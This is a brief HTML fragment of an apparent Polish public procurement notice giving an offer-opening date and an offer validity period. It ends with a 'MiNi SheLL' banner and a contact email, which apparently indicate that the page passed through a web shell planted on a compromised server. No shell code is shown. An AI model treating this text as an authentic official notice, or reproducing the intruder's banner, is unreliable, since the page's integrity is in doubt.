class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-26 16:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com